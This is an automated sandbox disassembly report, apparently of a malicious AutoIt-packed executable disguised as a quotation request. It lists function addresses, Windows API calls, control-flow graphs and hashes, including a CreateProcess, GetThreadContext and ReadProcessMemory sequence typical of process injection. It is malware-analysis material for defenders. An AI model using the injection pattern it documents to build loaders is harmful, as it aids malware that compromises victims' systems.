                                                      • Instruction ID: 8f4232f52b2b572385c0c981a2dac7d91e5ff47d07b034a85baf6dbfb74080e7
                                                      • Opcode Fuzzy Hash: 3f96f179646803efa3c72dfbbca67a9a919a1a9e35b17686cf933a8cf7304269
                                                      • Instruction Fuzzy Hash: 9F519230D04249DAEF15DBA4C858BEEBBB5BF58301F004198E209BB2C0D7B90B44CBA5
                                                      Function 007D407C Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 88windowCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 1098 7d407c-7d4092 1099 7d416f-7d4173 1098->1099 1100 7d4098-7d40ad call 7d7a16 1098->1100 1103 80d3c8-80d3d7 LoadStringW 1100->1103 1104 7d40b3-7d40d3 call 7d7bcc 1100->1104 1107 80d3e2-80d3fa call 7d7b2e call 7d6fe3 1103->1107 1104->1107 1108 7d40d9-7d40dd 1104->1108 1118 7d40ed-7d416a call 7f2de0 call 7d454e call 7f2dbc Shell_NotifyIconW call 7d5904 1107->1118 1120 80d400-80d41e call 7d7cab call 7d6fe3 call 7d7cab 1107->1120 1110 7d4174-7d417d call 7d8047 1108->1110 1111 7d40e3-7d40e8 call 7d7b2e 1108->1111 1110->1118 1111->1118 1118->1099 1120->1118
                                                      APIs
                                                      • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 0080D3D7
                                                        • Part of subcall function 007D7BCC: _memmove.LIBCMT ref: 007D7C06
                                                      • _memset.LIBCMT ref: 007D40FC
                                                      • _wcscpy.LIBCMT ref: 007D4150
                                                      • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 007D4160
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                      • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: IconLoadNotifyShell_String_memmove_memset_wcscpy
                                                      • String ID: Line:
                                                      • API String ID: 3942752672-1585850449
                                                      • Opcode ID: 62b402d1fc96f42b229a21ebc38453e398186064bb68be105e157778606d950c
                                                      • Instruction ID: 5ae0a2a4e278a9d1d3e532a610d4bac63dc993c8c662b4100e36236c9ce960b6
                                                      • Opcode Fuzzy Hash: 62b402d1fc96f42b229a21ebc38453e398186064bb68be105e157778606d950c
                                                      • Instruction Fuzzy Hash: 41319071008704AFD765EBA0DC49BEB77ECBF44300F14451BF68592292EB78A648C796
                                                      Function 007D686A Relevance: 7.3, APIs: 2, Strings: 2, Instructions: 260COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 1133 7d686a-7d6891 call 7d4ddd 1136 80e031-80e041 call 83955b 1133->1136 1137 7d6897-7d68a5 call 7d4ddd 1133->1137 1140 80e046-80e048 1136->1140 1137->1136 1144 7d68ab-7d68b1 1137->1144 1142 80e067-80e0af call 7f0db6 1140->1142 1143 80e04a-80e04d call 7d4e4a 1140->1143 1154 80e0b1-80e0bb 1142->1154 1155 80e0d4 1142->1155 1147 80e052-80e061 call 8342f8 1143->1147 1144->1147 1148 7d68b7-7d68d9 call 7d6a8c 1144->1148 1147->1142 1157 80e0cf-80e0d0 1154->1157 1156 80e0d6-80e0e9 1155->1156 1160 80e260-80e263 call 7f2d55 1156->1160 1161 80e0ef 1156->1161 1158 80e0d2 1157->1158 1159 80e0bd-80e0cc 1157->1159 1158->1156 1159->1157 1164 80e268-80e271 call 7d4e4a 1160->1164 1163 80e0f6-80e0f9 call 7d7480 1161->1163 1167 80e0fe-80e120 call 7d5db2 call 8373e9 1163->1167 1170 80e273-80e283 call 7d7616 call 7d5d9b 1164->1170 1177 80e122-80e12f 1167->1177 1178 80e134-80e13e call 8373d3 1167->1178 1186 80e288-80e2b8 call 82f7a1 call 7f0e2c call 7f2d55 call 7d4e4a 1170->1186 1180 80e227-80e237 call 7d750f 1177->1180 1184 80e140-80e153 1178->1184 1185 80e158-80e162 call 8373bd 1178->1185 1180->1167 1190 80e23d-80e247 call 7d735d 1180->1190 1184->1180 1194 80e164-80e171 1185->1194 1195 80e176-80e180 call 7d5e2a 1185->1195 1186->1170 1197 80e24c-80e25a 1190->1197 1194->1180 1195->1180 1203 80e186-80e19e call 82f73d 1195->1203 1197->1160 1197->1163 1208 80e1a0-80e1bf call 7d7de1 call 7d5904 1203->1208 1209 80e1c1-80e1c4 1203->1209 1232 80e1e2-80e1f0 call 7d5db2 1208->1232 1210 80e1f2-80e1f5 1209->1210 1211 80e1c6-80e1e1 call 7d7de1 call 7d6839 call 7d5904 1209->1211 1215 80e215-80e218 call 83737f 1210->1215 1216 80e1f7-80e200 call 82f65e 1210->1216 1211->1232 1222 80e21d-80e226 call 7f0e2c 1215->1222 1216->1186 1225 80e206-80e210 call 7f0e2c 1216->1225 1222->1180 1225->1167 1232->1222
                                                      APIs
                                                        • Part of subcall function 007D4DDD: LoadLibraryExW.KERNEL32(?,00000000,00000002,?,008952F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 007D4E0F
                                                      • _free.LIBCMT ref: 0080E263
                                                      • _free.LIBCMT ref: 0080E2AA
                                                        • Part of subcall function 007D6A8C: SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 007D6BAD
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                      • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: _free$CurrentDirectoryLibraryLoad
                                                      • String ID: >>>AUTOIT SCRIPT<<<$Bad directive syntax error
                                                      • API String ID: 2861923089-1757145024
                                                      • Opcode ID: ad9f0c9a17d793e8d427d7d35c9c16a8dbd351804b81f611f661a85666865a44
                                                      • Instruction ID: 06dfae741f705a45a0a9e96f7901e9390026614616d643647964f4d12187ff66
                                                      • Opcode Fuzzy Hash: ad9f0c9a17d793e8d427d7d35c9c16a8dbd351804b81f611f661a85666865a44
                                                      • Instruction Fuzzy Hash: BB914A71A00219EFCF14EFA4CC959EEB7B9FF14314B14482AF915EB2A1DB74A905CB50
                                                      Function 007D35B0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 59registryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,00000003,00000000,80000001,80000001,?,007D35A1,SwapMouseButtons,00000004,?), ref: 007D35D4
                                                      • RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,007D35A1,SwapMouseButtons,00000004,?,?,?,?,007D2754), ref: 007D35F5
                                                      • RegCloseKey.KERNELBASE(00000000,?,?,007D35A1,SwapMouseButtons,00000004,?,?,?,?,007D2754), ref: 007D3617
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                      • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: CloseOpenQueryValue
                                                      • String ID: Control Panel\Mouse
                                                      • API String ID: 3677997916-824357125
                                                      • Opcode ID: 39c7c643c4bad3e3f44a811c2efd3ba1a47194f8a272170eab879b59d9d7ed8f
                                                      • Instruction ID: 83b8e37d228e8c6ecc264d487ce41b7155355c5c4462a2f2482eeaa813947855
                                                      • Opcode Fuzzy Hash: 39c7c643c4bad3e3f44a811c2efd3ba1a47194f8a272170eab879b59d9d7ed8f
                                                      • Instruction Fuzzy Hash: 7F110375611218FADB208F64DC84EAABBB8EF04740F11856AB905D7210E6759E509BA2
                                                      Function 015EA538 Relevance: 6.7, APIs: 4, Instructions: 720processthreadCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • CreateProcessW.KERNELBASE(?,00000000), ref: 015EACF3
                                                      • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 015EAD89
                                                      • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 015EADAB
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1334107479.00000000015E9000.00000040.00000020.00020000.00000000.sdmp, Offset: 015E9000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_15e9000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                      • String ID:
                                                      • API String ID: 2438371351-0
                                                      • Opcode ID: cc658a0e6010fd3573e63fe9dffc1f366d2843c5c23e1a249a06af30add5367b
                                                      • Instruction ID: 11bc68284a24067c08c7243d9a3c9dbc9226fac859ae82b7ddcb237057212ac4
                                                      • Opcode Fuzzy Hash: cc658a0e6010fd3573e63fe9dffc1f366d2843c5c23e1a249a06af30add5367b
                                                      • Instruction Fuzzy Hash: 4C621B30E142589BEB24CFA4C844BDEB7B2FF58301F1095A9D11DEB290E7769E80CB59
                                                      Function 0083955B Relevance: 6.2, APIs: 4, Instructions: 155COMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 007D4EE5: _fseek.LIBCMT ref: 007D4EFD
                                                        • Part of subcall function 00839734: _wcscmp.LIBCMT ref: 00839824
                                                        • Part of subcall function 00839734: _wcscmp.LIBCMT ref: 00839837
                                                      • _free.LIBCMT ref: 008396A2
                                                      • _free.LIBCMT ref: 008396A9
                                                      • _free.LIBCMT ref: 00839714
                                                        • Part of subcall function 007F2D55: RtlFreeHeap.NTDLL(00000000,00000000,?,007F9A24), ref: 007F2D69
                                                        • Part of subcall function 007F2D55: GetLastError.KERNEL32(00000000,?,007F9A24), ref: 007F2D7B
                                                      • _free.LIBCMT ref: 0083971C
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                      • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
                                                      • String ID:
                                                      • API String ID: 1552873950-0
                                                      • Opcode ID: 83a1bf45cb5b46f0fbbb2b282febcfcf75e63ad05b5baa694a85d9b23f0f737c
                                                      • Instruction ID: 3a5ab82d76b064bd807a9907729354e016896a7bd704cb2d7445598d89a3659c
                                                      • Opcode Fuzzy Hash: 83a1bf45cb5b46f0fbbb2b282febcfcf75e63ad05b5baa694a85d9b23f0f737c
                                                      • Instruction Fuzzy Hash: 32513CB1904218EBDF249F64CC85AAEBBB9FF88300F10449EF649A3351DB755A818F59
                                                      Function 007F470A Relevance: 6.1, APIs: 4, Instructions: 136COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                      • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: __flsbuf__flush__getptd_noexit__write_memmove
                                                      • String ID:
                                                      • API String ID: 2782032738-0
                                                      • Opcode ID: 998aeda2236a74d80706e5f9a46343bd1135ee917ddd04e378ba6ed458c3dace
                                                      • Instruction ID: 2d9d3f6fbed902ecff2d2d8771687d3c1b1d9480e785cf75b29ab03764bd44aa
                                                      • Opcode Fuzzy Hash: 998aeda2236a74d80706e5f9a46343bd1135ee917ddd04e378ba6ed458c3dace
                                                      • Instruction Fuzzy Hash: EE41D374A0074EEBDB189E69C8849BF7BA5EF423A0B24813DEA15C7740EB78DD408B50
                                                      Function 007D44A0 Relevance: 6.1, APIs: 4, Instructions: 66timewindowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • _memset.LIBCMT ref: 007D44CF
                                                        • Part of subcall function 007D407C: _memset.LIBCMT ref: 007D40FC
                                                        • Part of subcall function 007D407C: _wcscpy.LIBCMT ref: 007D4150
                                                        • Part of subcall function 007D407C: Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 007D4160
                                                      • KillTimer.USER32(?,00000001,?,?), ref: 007D4524
                                                      • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 007D4533
                                                      • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 0080D4B9
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                      • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
                                                      • String ID:
                                                      • API String ID: 1378193009-0
                                                      • Opcode ID: 48efde4f6287a882caf06f663ab591934054029a9574dee872812d8ee67ff743
                                                      • Instruction ID: f17913f685956590b9a962d170839a06d5883bafc593fb809034f5d88af0055c
                                                      • Opcode Fuzzy Hash: 48efde4f6287a882caf06f663ab591934054029a9574dee872812d8ee67ff743
                                                      • Instruction Fuzzy Hash: 4E21C570504784AFE7729B64DC59BE6BBECFF05319F04009EE79E96282C3782984CB55
                                                      Function 007D7285 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • _memset.LIBCMT ref: 0080EA39
                                                      • GetOpenFileNameW.COMDLG32(?), ref: 0080EA83
                                                        • Part of subcall function 007D4750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,007D4743,?,?,007D37AE,?), ref: 007D4770
                                                        • Part of subcall function 007F0791: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 007F07B0
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                      • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: Name$Path$FileFullLongOpen_memset
                                                      • String ID: X
                                                      • API String ID: 3777226403-3081909835
                                                      • Opcode ID: 2645f085df251a142005be0d3b219b607f7ebf68cb21273ff7f902aee128b9ce
                                                      • Instruction ID: 99378a629945d402f815f28c2d3ebad2e890f254607a57c3d16f5dbf086dfad9
                                                      • Opcode Fuzzy Hash: 2645f085df251a142005be0d3b219b607f7ebf68cb21273ff7f902aee128b9ce
                                                      • Instruction Fuzzy Hash: BD219F71A00258DBCB559BD4CC49AEE7BF8BF48310F04405AE508E7381DBB85989CFA1
                                                      Function 008398E3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetTempPathW.KERNEL32(00000104,?), ref: 008398F8
                                                      • GetTempFileNameW.KERNELBASE(?,aut,00000000,?), ref: 0083990F
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                      • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: Temp$FileNamePath
                                                      • String ID: aut
                                                      • API String ID: 3285503233-3010740371
                                                      • Opcode ID: 0e6ce88b0734726beab6279e59b9d3e1c968ec3bf9015a18402c8fde54d8147b
                                                      • Instruction ID: 444e2d7f764a3eca8cb66c49e6209b6224232d63895998b9604483b8ae357e88
                                                      • Opcode Fuzzy Hash: 0e6ce88b0734726beab6279e59b9d3e1c968ec3bf9015a18402c8fde54d8147b
                                                      • Instruction Fuzzy Hash: 76D05EB958030DABDB50ABA0DC0EF9A773CF704702F4002B1BB54D61A2EAB495988B91
                                                      Function 0084CADD Relevance: 4.9, APIs: 3, Instructions: 392COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                      • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 9a1f7b64eca03fb803ff0472b585efe3d4bc8dbaf5a1e26d6980a792c90dcccc
                                                      • Instruction ID: 1666769c1169c2bf6df5e2bc9ba4cdb8c32e421614e5b94b30153524cf8c06b6
                                                      • Opcode Fuzzy Hash: 9a1f7b64eca03fb803ff0472b585efe3d4bc8dbaf5a1e26d6980a792c90dcccc
                                                      • Instruction Fuzzy Hash: 51F12770A083459FC754DF28C484A6ABBE9FF88314F14892EF8999B351DB74E945CF82
                                                      Function 007DF76F Relevance: 4.7, APIs: 3, Instructions: 168comCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 007F0162: MapVirtualKeyW.USER32(0000005B,00000000), ref: 007F0193
                                                        • Part of subcall function 007F0162: MapVirtualKeyW.USER32(00000010,00000000), ref: 007F019B
                                                        • Part of subcall function 007F0162: MapVirtualKeyW.USER32(000000A0,00000000), ref: 007F01A6
                                                        • Part of subcall function 007F0162: MapVirtualKeyW.USER32(000000A1,00000000), ref: 007F01B1
                                                        • Part of subcall function 007F0162: MapVirtualKeyW.USER32(00000011,00000000), ref: 007F01B9
                                                        • Part of subcall function 007F0162: MapVirtualKeyW.USER32(00000012,00000000), ref: 007F01C1
                                                        • Part of subcall function 007E60F9: RegisterWindowMessageW.USER32(WM_GETCONTROLNAME,?,007DF930), ref: 007E6154
                                                      • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 007DF9CD
                                                      • OleInitialize.OLE32(00000000), ref: 007DFA4A
                                                      • CloseHandle.KERNEL32(00000000), ref: 008145C8
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                      • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
                                                      • String ID:
                                                      • API String ID: 1986988660-0
                                                      • Opcode ID: 92ad3ec00ff5f3cce05d29f4c5726b3e55d58e308b45e3f1c373dcb531cc69a1
                                                      • Instruction ID: 1db78a3762dbf79ebcefafa42737992dddb3f776018777e5399e81dec0b4ea62
                                                      • Opcode Fuzzy Hash: 92ad3ec00ff5f3cce05d29f4c5726b3e55d58e308b45e3f1c373dcb531cc69a1
                                                      • Instruction Fuzzy Hash: 4C81EBF0902A40DFC786FFB9E8556187BE5FB89306758812BD109CB322EB744188CF59
                                                      Function 007D434A Relevance: 4.6, APIs: 3, Instructions: 77windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • _memset.LIBCMT ref: 007D4370
                                                      • Shell_NotifyIconW.SHELL32(00000000,?), ref: 007D4415
                                                      • Shell_NotifyIconW.SHELL32(00000001,?), ref: 007D4432
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                      • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: IconNotifyShell_$_memset
                                                      • String ID:
                                                      • API String ID: 1505330794-0
                                                      • Opcode ID: 283a77d0dc8141b3e5302f9a5c6c7e878d07eb31e3963f63b6c09393e529f8c5
                                                      • Instruction ID: 18aeb45c09e2f7393e7e933d07f2b91baf83b217911ad5f98c1836381a243c38
                                                      • Opcode Fuzzy Hash: 283a77d0dc8141b3e5302f9a5c6c7e878d07eb31e3963f63b6c09393e529f8c5
                                                      • Instruction Fuzzy Hash: FA319EB0504701DFC721EF68D88469BBBF8FB48309F00092FF69A92391E775A944CB92
                                                      Function 007F571C Relevance: 4.6, APIs: 3, Instructions: 59memoryCOMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      • __FF_MSGBANNER.LIBCMT ref: 007F5733
                                                        • Part of subcall function 007FA16B: __NMSG_WRITE.LIBCMT ref: 007FA192
                                                        • Part of subcall function 007FA16B: __NMSG_WRITE.LIBCMT ref: 007FA19C
                                                      • __NMSG_WRITE.LIBCMT ref: 007F573A
                                                        • Part of subcall function 007FA1C8: GetModuleFileNameW.KERNEL32(00000000,008933BA,00000104,?,00000001,00000000), ref: 007FA25A
                                                        • Part of subcall function 007FA1C8: ___crtMessageBoxW.LIBCMT ref: 007FA308
                                                        • Part of subcall function 007F309F: ___crtCorExitProcess.LIBCMT ref: 007F30A5
                                                        • Part of subcall function 007F309F: ExitProcess.KERNEL32 ref: 007F30AE
                                                        • Part of subcall function 007F8B28: __getptd_noexit.LIBCMT ref: 007F8B28
                                                      • RtlAllocateHeap.NTDLL(01530000,00000000,00000001,00000000,?,?,?,007F0DD3,?), ref: 007F575F
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                      • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
                                                      • String ID:
                                                      • API String ID: 1372826849-0
                                                      • Opcode ID: 6cf65307aed18558defc7fee31da19bda090149fae029c37a3bea942102abeee
                                                      • Instruction ID: b959ba22e721029be8a8adfd9c18b4fd22b926f896d572d26e0424b4e9db4443
                                                      • Opcode Fuzzy Hash: 6cf65307aed18558defc7fee31da19bda090149fae029c37a3bea942102abeee
                                                      • Instruction Fuzzy Hash: F501DE75340B0DEAD6113778EC8AA3E7798AF82362F210026F7199A382DE7C98004671
                                                      Function 008398A2 Relevance: 4.5, APIs: 3, Instructions: 24filetimeCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000003,00000080,00000000,?,?,00839548,?,?,?,?,?,00000004), ref: 008398BB
                                                      • SetFileTime.KERNELBASE(00000000,?,00000000,?,?,00839548,?,?,?,?,?,00000004,00000001,?,?,00000004), ref: 008398D1
                                                      • CloseHandle.KERNEL32(00000000,?,00839548,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 008398D8
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                      • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
